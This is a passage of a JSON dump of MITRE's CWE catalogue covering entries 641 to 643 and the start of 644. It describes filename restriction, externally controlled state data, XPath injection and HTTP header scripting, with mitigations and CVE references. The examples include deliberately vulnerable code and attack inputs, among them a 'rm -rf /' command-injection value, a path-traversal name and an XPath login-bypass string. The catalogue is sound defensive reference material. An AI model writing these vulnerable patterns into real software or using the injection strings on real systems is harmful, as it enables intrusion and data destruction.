Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Weak Password Recovery Mechanism","attr":{"@_Date":"2008-09-09"}}}},"641":{"attr":{"@_ID":"641","@_Name":"Improper Restriction of Names for Files and Other Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.","Extended_Description":"This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client\'s browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Execution of arbitrary code in the context of usage of the resources with dangerous names."},{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"Crash of the consumer code of these resources resulting in information leakage or denial of service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not allow users to control names of resources used on the server side."},{"Phase":"Architecture and Design","Description":"Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them."},{"Phase":"Architecture and Design","Description":"Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Filtering of File and Other Resource Names for Executable Content","attr":{"@_Date":"2010-06-21"}}}},"642":{"attr":{"@_ID":"642","@_Name":"External Control of Critical State Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors.","Extended_Description":{"xhtml:p":["If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed.","State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an \\"authenticated=true\\" cookie. An attacker may simply create this cookie in order to bypass the authentication."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could potentially modify the state in malicious ways. If the state is related to the privileges or level of authentication that the user has, then state modification might allow the user to bypass authentication or elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The state variables may contain sensitive information that should not be known by the client."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"By modifying state variables, the attacker could violate the application\'s expectations for the contents of the state, leading to a denial of service due to an unexpected error condition."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Understand all the potential locations that are accessible to attackers. For example, some programmers assume that cookies and hidden form fields cannot be modified by an attacker, or they may not consider that environment variables can be modified before a privileged program is invoked."},{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"Phase":"Architecture and Design","Description":"Store state information on the server side only. Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use some frameworks can maintain the state for you.","Examples include ASP.NET View State and the OWASP ESAPI Session Management feature.","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") && Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"Intro_Text":"The following code segment implements a basic server that uses the \\"ls\\" program to perform a directory listing of the directory that is listed in the \\"HOMEDIR\\" environment variable. The code intends to allow the user to specify an alternate \\"LANG\\" environment variable. This causes \\"ls\\" to customize its output based on a given language, which is an important capability when supporting internationalization.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ENV{\\"HOMEDIR\\"} = \\"/home/mydir/public/\\";my $stream = AcceptUntrustedInputStream();while (<$stream>) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"chomp;if (/^ENV ([\\\\w\\\\_]+) (.*)/) {}elsif (/^QUIT/) { ... }elsif (/^LIST/) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$ENV{$1} = $2;","attr":{"@_style":"margin-left:10px;"}},{"#text":"open($fh, \\"/bin/ls -l $ENV{HOMEDIR}|\\");while (<$fh>) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"SendOutput($stream, \\"FILEINFO: $_\\");","attr":{"@_style":"margin-left:10px;"}}}]}}}},"Body_Text":["The programmer takes care to call a specific \\"ls\\" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as \\"ENV HOMEDIR /secret/directory\\" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as \\"/tmp; rm -rf /\\". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed.","While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2428","Description":"Mail client stores password hashes for unrelated accounts in a hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2428"},{"Reference":"CVE-2008-0306","Description":"Privileged program trusts user-specified environment variable to modify critical configuration settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0306"},{"Reference":"CVE-1999-0073","Description":"Telnet daemon allows remote clients to specify critical environment variables for the server, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073"},{"Reference":"CVE-2007-4432","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4432"},{"Reference":"CVE-2006-7191","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7191"},{"Reference":"CVE-2008-5738","Description":"Calendar application allows bypass of authentication by setting a certain cookie value to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5738"},{"Reference":"CVE-2008-5642","Description":"Setting of a language preference in a cookie enables path traversal attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5642"},{"Reference":"CVE-2008-5125","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5125"},{"Reference":"CVE-2008-5065","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5065"},{"Reference":"CVE-2008-4752","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4752"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-528"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form Fields." Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Relevant_Properties, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Insufficient Management of User State","attr":{"@_Date":"2008-04-11"}},{"#text":"External Control of User State Data","attr":{"@_Date":"2009-01-12"}}]}},"643":{"attr":{"@_ID":"643","@_Name":"Improper Neutralization of Data within XPath Expressions (\'XPath Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Controlling application flow (e.g. bypassing authentication)."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker could read restricted XML content."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized XPath queries (e.g. using XQuery). This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XPath queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information:","Example_Code":[{"attr":{"@_Nature":"informative","@_Language":"XML"},"xhtml:div":{"#text":"<users></users>","xhtml:div":{"#text":"<user></user><user></user>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<login>john</login><password>abracadabra</password><home_dir>/home/john</home_dir>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"<login>cbc</login><password>1mgr8</password><home_dir>/home/cbc</home_dir>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"XPath xpath = XPathFactory.newInstance().newXPath();XPathExpression xlogin = xpath.compile(\\"//users/user[login/text()=\'\\" + login.getUserName() + \\"\' and password/text() = \'\\" + login.getPassword() + \\"\']/home_dir/text()\\");Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File(\\"db.xml\\"));String homedir = xlogin.evaluate(d);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"//users/user[login/text()=\'john\' or \'\'=\'\' and password/text() = \'\' or \'\'=\'\']/home_dir/text()"}],"Body_Text":["The Java code used to retrieve the home directory based on the provided credentials is:","Assume that user \\"john\\" wishes to leverage XPath Injection and login without a valid password. By providing a username \\"john\\" and password \\"\' or \'\'=\'\\" the XPath expression now becomes","which, of course, lets user \\"john\\" login without a valid password, thus bypassing authentication."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":39,"Entry_Name":"XPath Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-531"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "XPath Injection", Page 1070"}}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XPath Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XPath Expressions (aka \'XPath injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XPath Expressions (\'XPath injection\')","attr":{"@_Date":"2010-04-05"}}]}},"644":{"attr":{"@_ID":"644","@_Name":"Improper Neutralization of HTTP Headers for Scripting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.","Extended_Description":{"xhtml:p":["An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled.","If an application does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client\'s browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Run arbitrary code."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers may be able to obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header."},{"Phase":"Architecture and Design","Description":"Disable script execution functionality in the clients\' browser."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, user-controlled data is added to the HTTP headers and returned 